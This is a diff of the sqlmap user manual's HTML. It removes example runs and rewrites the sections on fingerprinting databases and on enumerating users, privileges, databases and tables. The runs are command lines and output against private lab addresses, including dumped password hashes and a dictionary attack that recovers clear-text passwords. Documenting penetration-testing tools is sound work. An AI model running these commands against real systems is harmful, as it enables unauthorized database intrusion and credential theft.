-back-end DBMS: active fingerprint: Oracle 10g
-               html error message fingerprint: Oracle
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
-
-<P>Example on a <B>PostgreSQL 8.3.5</B> target:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/pgsql/get_int.php?id=1" -v 1 -f
-
-[...]
-[hh:mm:14] [WARNING] the back-end DMBS is not Oracle
-[hh:mm:14] [INFO] testing PostgreSQL
-[hh:mm:14] [INFO] confirming PostgreSQL
-[hh:mm:14] [INFO] the back-end DBMS is PostgreSQL
-[hh:mm:14] [INFO] retrieved: 2
-[hh:mm:14] [INFO] retrieved: 
-web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
-web application technology: PHP 5.2.6, Apache 2.2.9
-back-end DBMS: active fingerprint: PostgreSQL >= 8.3.0
-               html error message fingerprint: PostgreSQL
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
-
 <P>As you can see from the last example, sqlmap first tested for MySQL,
 then for Oracle, then for PostgreSQL since the user did not forced the
 back-end database management system name with option <CODE>-</CODE><CODE>-dbms</CODE>.</P>
 
-<P>Example on a <B>Microsoft SQL Server 2000 Service Pack 0</B> target:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mssql/get_int.php?id=1" -v 1 -f
-
-[...]
-[hh:mm:41] [WARNING] the back-end DMBS is not PostgreSQL
-[hh:mm:41] [INFO] testing Microsoft SQL Server
-[hh:mm:41] [INFO] confirming Microsoft SQL Server
-[hh:mm:41] [INFO] the back-end DBMS is Microsoft SQL Server
-web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
-web application technology: PHP 5.2.6, Apache 2.2.9
-back-end DBMS:  active fingerprint: Microsoft SQL Server 2000
-                html error message fingerprint: Microsoft SQL Server
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
-
-<P>Example on a <B>Microsoft SQL Server 2005 Service Pack 0</B> target:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u "http://172.16.213.36/sqlmap/get_str.asp?name=luther" -v 1 -f
-
-[...]
-[hh:mm:41] [WARNING] the back-end DMBS is not PostgreSQL
-[hh:mm:41] [INFO] testing Microsoft SQL Server
-[hh:mm:41] [INFO] confirming Microsoft SQL Server
-[hh:mm:41] [INFO] the back-end DBMS is Microsoft SQL Server
-web server operating system: Windows 2003 or 2000
-web application technology: ASP.NET, Microsoft IIS 6.0, ASP
-back-end DBMS: active fingerprint: Microsoft SQL Server 2005
-               html error message fingerprint: Microsoft SQL Server
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
-
 <P>If you want an even more accurate result, based also on banner parsing,
 you can also provide the <CODE>-b</CODE> or <CODE>-</CODE><CODE>-banner</CODE> option.</P>
 
-<P>Example on a <B>MySQL 5.0.67</B> target:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" -v 2 -f -b
-
-[...]
-[hh:mm:04] [INFO] testing MySQL
-[hh:mm:04] [INFO] confirming MySQL
-[hh:mm:04] [DEBUG] query: SELECT 0 FROM information_schema.TABLES LIMIT 0, 1
-[hh:mm:04] [INFO] retrieved: 0
-[hh:mm:04] [DEBUG] performed 13 queries in 0 seconds
-[hh:mm:04] [INFO] the back-end DBMS is MySQL
-[hh:mm:04] [DEBUG] query: VERSION()
-[hh:mm:04] [INFO] retrieved: 5.0.67-0ubuntu6
-[hh:mm:05] [DEBUG] performed 111 queries in 1 seconds
-[hh:mm:05] [DEBUG] query: SELECT 0 FROM information_schema.PARAMETERS LIMIT 0, 1
-[hh:mm:05] [INFO] retrieved: 
-[hh:mm:05] [DEBUG] performed 6 queries in 0 seconds
-[hh:mm:05] [DEBUG] query: MID(@@table_open_cache, 1, 1)
-[hh:mm:05] [INFO] retrieved: 
-[hh:mm:05] [DEBUG] performed 6 queries in 0 seconds
-[hh:mm:05] [DEBUG] query: MID(@@hostname, 1, 1)
-[hh:mm:05] [INFO] retrieved: t
-[hh:mm:06] [DEBUG] performed 13 queries in 0 seconds
-[hh:mm:06] [INFO] executing MySQL comment injection fingerprint
-web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
-web application technology: PHP 5.2.6, Apache 2.2.9
-back-end DBMS operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
-back-end DBMS: active fingerprint: MySQL >= 5.0.38 and &lt; 5.1.2
-               comment injection fingerprint: MySQL 5.0.67
-               banner parsing fingerprint: MySQL 5.0.67
-               html error message fingerprint: MySQL
-[...]
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
-
 <P>As you can see, sqlmap was also able to fingerprint the back-end DBMS
 operating system by parsing the DBMS banner value.</P>
 
-<P>Example on a <B>Microsoft SQL Server 2000 Service Pack 0</B> target:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mssql/get_int.php?id=1" -v 2 -f -b
-
-[...]
-[hh:mm:03] [WARNING] the back-end DMBS is not PostgreSQL
-[hh:mm:03] [INFO] testing Microsoft SQL Server
-[hh:mm:03] [INFO] confirming Microsoft SQL Server
-[hh:mm:03] [INFO] the back-end DBMS is Microsoft SQL Server
-[hh:mm:03] [DEBUG] performed 13 queries in 0 seconds
-[hh:mm:03] [DEBUG] query: @@VERSION
-[hh:mm:03] [INFO] retrieved: Microsoft SQL Server  2000 - 8.00.194 (Intel X86) 
-        Aug  6 2000 00:57:48 
-        Copyright (c) 1988-2000 Microsoft Corporation
-        Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
-
-[hh:mm:08] [DEBUG] performed 1308 queries in 4 seconds
-web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
-web application technology: PHP 5.2.6, Apache 2.2.9
-back-end DBMS operating system: Windows 2000 Service Pack 4
-back-end DBMS:  active fingerprint: Microsoft SQL Server 2000
-                banner parsing fingerprint: Microsoft SQL Server 2000 Service Pack 0 
-                version 8.00.194
-                html error message fingerprint: Microsoft SQL Server
-[...]
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
-
-<P>Example on a <B>Microsoft SQL Server 2005 Service Pack 0</B> target:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u "http://172.16.213.36/sqlmap/get_str.asp?name=luther" -v 2 -f -b
-
-[...]
-[hh:mm:03] [WARNING] the back-end DMBS is not PostgreSQL
-[hh:mm:03] [INFO] testing Microsoft SQL Server
-[hh:mm:03] [INFO] confirming Microsoft SQL Server
-[hh:mm:03] [INFO] the back-end DBMS is Microsoft SQL Server
-[hh:mm:03] [DEBUG] query: @@VERSION
-[hh:mm:03] [INFO] retrieved: Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86) 
-        Oct 14 2005 00:33:37 
-        Copyright (c) 1988-2005 Microsoft Corporation
-        Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 1)
-
-[hh:mm:15] [DEBUG] performed 1343 queries in 11 seconds
-web server operating system: Windows 2003 or 2000
-web application technology: ASP.NET, Microsoft IIS 6.0, ASP
-back-end DBMS operating system: Windows 2003 Service Pack 1
-back-end DBMS: active fingerprint: Microsoft SQL Server 2005
-               banner parsing fingerprint: Microsoft SQL Server 2005 Service Pack 0 
-               version 9.00.1399
-               html error message fingerprint: Microsoft SQL Server
-[...]
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
-
 <P>As you can see, from the Microsoft SQL Server banner, sqlmap was able to
 correctly identify the database management system patch level.
 The Microsoft SQL Server XML versions file is the result of a sqlmap
@@ -2979,7 +1790,7 @@ parsing library that fetches data from Chip Andrews'
 <A HREF="http://www.sqlsecurity.com/FAQs/SQLServerVersionDatabase/tabid/63/Default.aspx">SQLSecurity.com site</A> and outputs it to the XML versions file.</P>
 
 
-<H2><A NAME="ss5.7">5.7</A> <A HREF="#toc5.7">Enumeration</A>
+<H2><A NAME="ss5.9">5.9</A> <A HREF="#toc5.9">Enumeration</A>
 </H2>
 
 <P>These options can be used to enumerate the back-end database management
@@ -2989,689 +1800,188 @@ you can run your own SQL statements.</P>
 
 <H3>Banner</H3>
 
-<P>Option: <CODE>-b</CODE> or <CODE>-</CODE><CODE>-banner</CODE></P>
+<P>Switch: <CODE>-b</CODE> or <CODE>-</CODE><CODE>-banner</CODE></P>
 
 <P>Most of the modern database management systems have a function and/or 
-an environment variable which returns details on the database management
-system version. Also, sometimes it returns the operating system version 
-where the daemon has been compiled on, the operating system architecture, 
-and its service pack. Usually the function is <CODE>version()</CODE> and the 
-environment variable <CODE>@@version</CODE>.</P>
-
-<P>Example on a <B>MySQL 5.0.67</B> target:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" -b -v 0
-
-banner:    '5.0.67-0ubuntu6'
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
-
-<P>Example on a <B>PostgreSQL 8.3.5</B> target:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/pgsql/get_int.php?id=1" -b -v 0
-
-banner:    'PostgreSQL 8.3.5 on i486-pc-linux-gnu, compiled by GCC gcc-4.3.real 
-(Ubuntu 4.3.2-1ubuntu11) 4.3.2'
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
-
-<P>Example on an <B>Oracle XE 10.2.0.1</B> target:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/oracle/get_int.php?id=1" -b -v 0
-
-banner:    'Oracle Database 10g Express Edition Release 10.2.0.1.0 - Product'
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
-
-<P>Example on a <B>Microsoft SQL Server 2000 Service Pack 0</B> target:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mssql/get_int.php?id=1" -b -v 0
-
-banner:
----
-Microsoft SQL Server  2000 - 8.00.194 (Intel X86) 
-        Aug  6 2000 00:57:48 
-        Copyright (c) 1988-2000 Microsoft Corporation
-        Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
----
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
-
-<P>Example on a <B>Microsoft SQL Server 2005 Service Pack 0</B> target:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u "http://172.16.213.36/sqlmap/get_str.asp?name=luther" -v 0 -b
-
-banner:
----
-Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86) 
-        Oct 14 2005 00:33:37 
-        Copyright (c) 1988-2005 Microsoft Corporation
-        Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 1)
----
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
+an environment variable which returns the database management system
+version and eventually details on its patch level, the underlying
+system. Usually the function is <CODE>version()</CODE> and the environment
+variable is <CODE>@@version</CODE>, but this vary depending on the target
+DBMS.</P>
 
 
 <H3>Session user</H3>
 
-<P>Option: <CODE>-</CODE><CODE>-current-user</CODE></P>
+<P>Switch: <CODE>-</CODE><CODE>-current-user</CODE></P>
 
-<P>It is possible to retrieve the database management system's user which is
-effectively performing the query on the database from the web application.</P>
-
-<P>Example on a <B>MySQL 5.0.67</B> target:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" --current-user -v 0
-
-current user:    'testuser@localhost'
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
+<P>On the majority of modern DBMSes is possible to retrieve the database
+management system's user which is effectively performing the query against
+the back-end DBMS from the web application.</P>
 
 
 <H3>Current database</H3>
 
-<P>Option: <CODE>-</CODE><CODE>-current-db</CODE></P>
+<P>Switch: <CODE>-</CODE><CODE>-current-db</CODE></P>
 
-<P>It is possible to retrieve the database management system's database the
-web application is connected to.</P>
+<P>It is possible to retrieve the database management system's database name
+that the web application is connected to.</P>
 
-<P>Example on a <B>Microsoft SQL Server 2000 Service Pack 0</B> target:</P>
+
+<H3>Detect whether or not the session user is a database administrator</H3>
+
+<P>Switch: <CODE>-</CODE><CODE>-is-dba</CODE></P>
+
+<P>It is possible to detect if the current database management system session
+user is a database administrator, also known as DBA.
+sqlmap will return <CODE>True</CODE> if it is, viceversa <CODE>False</CODE>.</P>
+
+
+<H3>List database management system users</H3>
+
+<P>Switch: <CODE>-</CODE><CODE>-users</CODE></P>
+
+<P>When the session user has read access to the system table containing
+information about the DBMS users, it is possible to enumerate the list of
+users.</P>
+
+
+<H3>List and crack database management system users password hashes</H3>
+
+<P>Switches: <CODE>-</CODE><CODE>-passwords</CODE> and <CODE>-U</CODE></P>
+
+<P>When the session user has read access to the system table containing
+information about the DBMS users' passwords, it is possible to enumerate
+the password hashes for each database management system user.
+sqlmap will first enumerate the users, then the different password hashes
+for each of them.</P>
+
+<P>Example against a PostgreSQL target:</P>
 <P>
 <BLOCKQUOTE><CODE>
 <PRE>
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mssql/get_int.php?id=1" --current-db -v 0
-
-current database:    'master'
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
-
-
-<H3>Detect if the session user is a database administrator (DBA)</H3>
-
-<P>Option: <CODE>-</CODE><CODE>-is-dba</CODE></P>
-
-<P>It is possible to detect if the current database management system session user is
-a database administrator.</P>
-
-<P>Example on a <B>PostgreSQL 8.3.5</B> target:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/pgsql/get_int.php?id=1" --is-dba -v 2
+$ python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1" --passwords -v 1
 
 [...]
 back-end DBMS: PostgreSQL
-
-[hh:mm:49] [INFO] testing if current user is DBA
-[hh:mm:49] [DEBUG] query: SELECT (CASE WHEN ((SELECT usesuper=true FROM pg_user WHERE 
-usename=CURRENT_USER OFFSET 0 LIMIT 1)) THEN 1 ELSE 0 END)
-[hh:mm:49] [INFO] retrieved: 1
-[hh:mm:50] [DEBUG] performed 13 queries in 0 seconds
-current user is DBA:    'True'
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
-
-<P>Example on an <B>Oracle XE 10.2.0.1</B> target:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/oracle/get_int.php?id=1" --is-dba -v 2
-
-[...]
-back-end DBMS: Oracle
-
-[hh:mm:57] [INFO] testing if current user is DBA
-[hh:mm:58] [DEBUG] query: SELECT (CASE WHEN ((SELECT GRANTED_ROLE FROM DBA_ROLE_PRIVS WHERE 
-GRANTEE=SYS.LOGIN_USER AND GRANTED_ROLE=CHR(68)||CHR(66)||CHR(65))=CHR(68)||CHR(66)||CHR(65)) 
-THEN 1 ELSE 0 END) FROM DUAL
-[hh:mm:58] [INFO] retrieved: 1
-[hh:mm:58] [DEBUG] performed 13 queries in 0 seconds
-current user is DBA:    'True'
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
-
-
-<H3>Users</H3>
-
-<P>Option: <CODE>-</CODE><CODE>-users</CODE></P>
-
-<P>It is possible to enumerate the list of database management system users.</P>
-
-<P>Example on a <B>PostgreSQL 8.3.5</B> target:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/pgsql/get_int.php?id=1" --users -v 0
-
-database management system users [3]:
-[*] postgres
-[*] testuser
-[*] testuser2
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
-
-
-<H3>Users password hashes</H3>
-
-<P>Options: <CODE>-</CODE><CODE>-passwords</CODE> and <CODE>-U</CODE></P>
-
-<P>It is possible to enumerate the password hashes for each database
-management system user.</P>
-
-<P>Example on a <B>MySQL 5.0.67</B> target:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" --passwords -v 0
-
-[*] debian-sys-maint [1]:
-    password hash: *BBDC22D2B1E18C8628D29228649621B32A1B1892
-[*] root [1]:
-    password hash: *81F5E21235407A884A6CD4A731FEBFB6AF209E1B
-[*] testuser [1]:
-    password hash: *00E247BD5F9AF26AE0194B71E1E769D1E1429A29
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
-
-<P>You can also provide the <CODE>-U</CODE> option to specify the user who you
-want to enumerate the password hashes.</P>
-
-<P>Example on a <B>Microsoft SQL Server 2000 Service Pack 0</B> target:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mssql/get_int.php?id=1" --passwords \
-  -U sa -v 0
-
-database management system users password hashes:
-[*] sa [1]:
-    password hash: 0x01000a16d704fa252b7c38d1aeae18756e98172f4b34104d8ce32c2f01b293b03edb7491f
-ba9930b62ee5d506955
-        header: 0x0100
-        salt: 0a16d704
-        mixedcase: fa252b7c38d1aeae18756e98172f4b34104d8ee3
-        uppercase: 2c2f01b293b03edb7491fba9930b62ce5d506955
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
-
-<P>As you can see, when you enumerate password hashes on Microsoft SQL Server
-sqlmap split the hash, useful if you want to crack it.</P>
-
-<P>If you provide <CODE>CU</CODE> as username it will consider it as an alias for
-current user and will retrieve the password hashes for this user.</P>
-
-<P>Example on a <B>PostgreSQL 8.3.5</B> target:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/pgsql/get_int.php?id=1" --passwords \
-  -U CU -v 1
-
-[...]
-back-end DBMS: PostgreSQL
-
-[hh:mm:48] [INFO] fetching current user
-[hh:mm:48] [INFO] retrieved: postgres
-[hh:mm:49] [INFO] fetching database users password hashes for current user
-[hh:mm:49] [INFO] fetching number of password hashes for user 'postgres'
-[hh:mm:49] [INFO] retrieved: 1
-[hh:mm:49] [INFO] fetching password hashes for user 'postgres'
-[hh:mm:49] [INFO] retrieved: md5d7d880f96044b72d0bba108ace96d1e4
+[hh:mm:38] [INFO] fetching database users password hashes
+do you want to use dictionary attack on retrieved password hashes? [Y/n/q] y
+[hh:mm:42] [INFO] using hash method: 'postgres_passwd'
+what's the dictionary's location? [/tmp/sqlmap/txt/wordlist.txt] 
+[hh:mm:46] [INFO] loading dictionary from: '/tmp/sqlmap/txt/wordlist.txt'
+do you want to use common password suffixes? (slow!) [y/N] n
+[hh:mm:48] [INFO] starting dictionary attack (postgres_passwd)
+[hh:mm:49] [INFO] found: 'testpass' for user: 'testuser'
+[hh:mm:50] [INFO] found: 'testpass' for user: 'postgres'
 database management system users password hashes:
 [*] postgres [1]:
-    password hash: md5d7d880f96034b72d0bba108afe96c1e7
+    password hash: md5d7d880f96044b72d0bba108ace96d1e4
+    clear-text password: testpass
+[*] testuser [1]:
+    password hash: md599e5ea7a6f7c3269995cba3927fd0093
+    clear-text password: testpass
 </PRE>
 </CODE></BLOCKQUOTE>
 </P>
 
+<P>Not only sqlmap enumerated the DBMS users and their passwords, but it also
+recognized the hash format to be PostgreSQL, asked the user whether or not
+to test the hashes against a dictionary file and identified the clear-text
+password for the <CODE>postgres</CODE> user, which is usually a DBA along the
+other user, <CODE>testuser</CODE>, password.</P>
 
-<H3>Users privileges</H3>
+<P>This feature has been implemented for all DBMS where it is possible to
+enumerate users' password hashes, including Oracle and Microsoft SQL
+Server pre and post 2005.</P>
 
-<P>Options: <CODE>-</CODE><CODE>-privileges</CODE> and <CODE>-U</CODE></P>
+<P>You can also provide the <CODE>-U</CODE> option to specify the specific user
+who you want to enumerate and eventually crack the password hash(es).
+If you provide <CODE>CU</CODE> as username it will consider it as an alias for
+current user and will retrieve the password hash(es) for this user.</P>
 
-<P>It is possible to enumerate the privileges for each database management
-system user.</P>
 
-<P>Example on an <B>Oracle XE 10.2.0.1</B> target:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/oracle/get_int.php?id=1" --privileges -v 0
+<H3>List database management system users privileges</H3>
 
-[hh:mm:25] [WARNING] unable to retrieve the number of privileges for user 'ANONYMOUS'
-[hh:mm:28] [WARNING] unable to retrieve the number of privileges for user 'DIP'
-database management system users privileges:
-[*] CTXSYS [2]:
-    privilege: CTXAPP
-    privilege: RESOURCE
-[*] DBSNMP [1]:
-    privilege: OEM_MONITOR
-[*] FLOWS_020100 (administrator) [4]:
-    privilege: CONNECT
-    privilege: DBA
-    privilege: RESOURCE
-    privilege: SELECT_CATALOG_ROLE
-[*] FLOWS_FILES [2]:
-    privilege: CONNECT
-    privilege: RESOURCE
-[*] HR (administrator) [3]:
-    privilege: CONNECT
-    privilege: DBA
-    privilege: RESOURCE
-[*] MDSYS [2]:
-    privilege: CONNECT
-    privilege: RESOURCE
-[*] OUTLN [1]:
-    privilege: RESOURCE
-[*] SYS (administrator) [22]:
-    privilege: AQ_ADMINISTRATOR_ROLE
-    privilege: AQ_USER_ROLE
-    privilege: AUTHENTICATEDUSER
-    privilege: CONNECT
-    privilege: CTXAPP
-    privilege: DBA
-    privilege: DELETE_CATALOG_ROLE
-    privilege: EXECUTE_CATALOG_ROLE
-    privilege: EXP_FULL_DATABASE
-    privilege: GATHER_SYSTEM_STATISTICS
-    privilege: HS_ADMIN_ROLE
-    privilege: IMP_FULL_DATABASE
-    privilege: LOGSTDBY_ADMINISTRATOR
-    privilege: OEM_ADVISOR
-    privilege: OEM_MONITOR
-    privilege: PLUSTRACE
-    privilege: RECOVERY_CATALOG_OWNER
-    privilege: RESOURCE
-    privilege: SCHEDULER_ADMIN
-    privilege: SELECT_CATALOG_ROLE
-    privilege: XDBADMIN
-    privilege: XDBWEBSERVICES
-[*] SYSTEM (administrator) [2]:
-    privilege: AQ_ADMINISTRATOR_ROLE
-    privilege: DBA
-[*] TSMSYS [1]:
-    privilege: RESOURCE
-[*] XDB [2]:
-    privilege: CTXAPP
-    privilege: RESOURCE
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
+<P>Switches: <CODE>-</CODE><CODE>-privileges</CODE> and <CODE>-U</CODE></P>
+
+<P>When the session user has read access to the system table containing
+information about the DBMS users, it is possible to enumerate the
+privileges for each database management system user.
+By the privileges, sqlmap will also show you which are database
+administrators.</P>
 
 <P>You can also provide the <CODE>-U</CODE> option to specify the user who you
 want to enumerate the privileges.</P>
 
-<P>Example on a <B>PostgreSQL 8.3.5</B> target:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/pgsql/get_int.php?id=1" --privileges \
-  -U postgres -v 0
+<P>If you provide <CODE>CU</CODE> as username it will consider it as an alias for
+current user and will enumerate the privileges for this user.</P>
 
-database management system users privileges:
-[*] postgres (administrator) [3]:
-    privilege: catupd
-    privilege: createdb
-    privilege: super
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
 
-<P>As you can see, depending on the user privileges, sqlmap identifies if the
-user is a database management system administrator and shows this information
-next to the username.</P>
+<H3>List database management system users roles</H3>
+
+<P>Switches: <CODE>-</CODE><CODE>-roles</CODE> and <CODE>-U</CODE></P>
+
+<P>When the session user has read access to the system table containing
+information about the DBMS users, it is possible to enumerate the
+roles for each database management system user.</P>
+
+<P>You can also provide the <CODE>-U</CODE> option to specify the user who you
+want to enumerate the privileges.</P>
 
 <P>If you provide <CODE>CU</CODE> as username it will consider it as an alias for
 current user and will enumerate the privileges for this user.</P>
 
-<P>Example on a <B>PostgreSQL 8.3.5</B> target:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/pgsql/get_int.php?id=1" --passwords \
-  -U CU -v 1
-
-[...]
-back-end DBMS: PostgreSQL
-
-[hh:mm:25] [INFO] fetching current user
-[hh:mm:25] [INFO] retrieved: postgres
-[hh:mm:25] [INFO] fetching database users privileges for current user
-[hh:mm:25] [INFO] fetching number of privileges for user 'postgres'
-[hh:mm:25] [INFO] retrieved: 1
-[hh:mm:25] [INFO] fetching privileges for user 'postgres'
-[hh:mm:25] [INFO] the SQL query provided has more than a field. sqlmap will now unpack it 
-into distinct queries to be able to retrieve the output even if we are going blind
-[hh:mm:25] [INFO] retrieved: 1
-[hh:mm:25] [INFO] retrieved: 1
-[hh:mm:25] [INFO] retrieved: 1
-database management system users privileges:
-[*] postgres (administrator) [3]:
-    privilege: catupd
-    privilege: createdb
-    privilege: super
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
-
-<P>Note that this feature is not available if the back-end database
-management system is Microsoft SQL Server.</P>
+<P>This feature is only available when the DBMS is Oracle.</P>
 
 
-<H3>Available databases</H3>
+<H3>List database management system's databases</H3>
 
-<P>Option: <CODE>-</CODE><CODE>-dbs</CODE></P>
+<P>Switch: <CODE>-</CODE><CODE>-dbs</CODE></P>
 
-<P>It is possible to enumerate the list of databases.</P>
+<P>When the session user has read access to the system table containing
+information about available databases, it is possible to enumerate the
+list of databases.</P>
 
-<P>Example on a <B>Microsoft SQL Server 2000 Service Pack 0</B> target:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mssql/get_int.php?id=1" --dbs -v 0
+<P>Note that this feature is not available if the database management system
+is Oracle.</P>
 
-available databases [6]:
-[*] master
-[*] model
-[*] msdb
-[*] Northwind
-[*] pubs
-[*] tempdb
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
 
-<P>Note that this feature is not available if the back-end database
-management system is Oracle.</P>
+<H3>Enumerate database's tables</H3>
 
-<H3>Databases tables</H3>
+<P>Switches: <CODE>-</CODE><CODE>-tables</CODE> and <CODE>-D</CODE></P>
 
-<P>Options: <CODE>-</CODE><CODE>-tables</CODE> and <CODE>-D</CODE></P>
+<P>When the session user has read access to the system table containing
+information about databases' tables, it is possible to enumerate
+the list of tables for a specific database management system's databases.</P>
 
-<P>It is possible to enumerate the list of tables for all database
-management system's databases.</P>
-
-<P>Example on a <B>MySQL 5.0.67</B> target:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" --tables -v 0
-
-Database: testdb
-[1 table]
-+---------------------------------------+
-| users                                 |
-+---------------------------------------+
-
-Database: information_schema
-[17 tables]
-+---------------------------------------+
-| CHARACTER_SETS                        |
-| COLLATION_CHARACTER_SET_APPLICABILITY |
-| COLLATIONS                            |
-| COLUMN_PRIVILEGES                     |
-| COLUMNS                               |
-| KEY_COLUMN_USAGE                      |
-| PROFILING                             |
-| ROUTINES                              |
-| SCHEMA_PRIVILEGES                     |
-| SCHEMATA                              |
-| STATISTICS                            |
-| TABLE_CONSTRAINTS                     |
-| TABLE_PRIVILEGES                      |
-| TABLES                                |
-| TRIGGERS                              |
-| USER_PRIVILEGES                       |
-| VIEWS                                 |
-+---------------------------------------+
-
-Database: mysql
-[17 tables]
-+---------------------------------------+
-| columns_priv                          |
-| db                                    |
-| func                                  |
-| help_category                         |
-| help_keyword                          |
-| help_relation                         |
-| help_topic                            |
-| host                                  |
-| proc                                  |
-| procs_priv                            |
-| tables_priv                           |
-| time_zone                             |
-| time_zone_leap_second                 |
-| time_zone_name                        |
-| time_zone_transition                  |
-| time_zone_transition_type             |
-| user                                  |
-+---------------------------------------+
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
-
-<P>You can also provide the <CODE>-D</CODE> option to specify the database
-that you want to enumerate the tables.</P>
-
-<P>Example on a <B>MySQL 5.0.67</B> target:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" --tables \
-  -D testdb -v 0
-
-Database: testdb
-[1 table]
-+---------------------------------------+
-| users                                 |
-+---------------------------------------+
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
-
-<P>Example on an <B>Oracle XE 10.2.0.1</B> target:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/oracle/get_int.php?id=1" --tables \
-  -D users -v 0
-
-Database: USERS
-[8 tables]
-+-------------------+
-| DEPARTMENTS       |
-| EMPLOYEES         |
-| HTMLDB_PLAN_TABLE |
-| JOB_HISTORY       |
-| JOBS              |
-| LOCATIONS         |
-| REGIONS           |
-| USERS             |
-+-------------------+
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
+<P>If you do not provide a specific database with switch <CODE>-D</CODE>, sqlmap
+will enumerate the tables for all DBMS databases.</P>
 
 <P>Note that on Oracle you have to provide the <CODE>TABLESPACE_NAME</CODE>
-instead of the database name. In provided example <CODE>users</CODE> was
-used to retrieve all tables owned by an Oracle database management 
-system user.</P>
+instead of the database name.</P>
 
 
-<H3>Database table columns</H3>
+<H3>Enumerate database table columns</H3>
 
-<P>Options: <CODE>-</CODE><CODE>-columns</CODE>, <CODE>-C</CODE>, <CODE>-T</CODE> and <CODE>-D</CODE></P>
+<P>Switches: <CODE>-</CODE><CODE>-columns</CODE>, <CODE>-C</CODE>, <CODE>-T</CODE> and <CODE>-D</CODE></P>
 
-<P>It is possible to enumerate the list of columns for a specific database
-table.
-This functionality depends on the option <CODE>-T</CODE> to specify the table name
-and optionally on <CODE>-D</CODE> to specify the database name.</P>
+<P>When the session user has read access to the system table containing
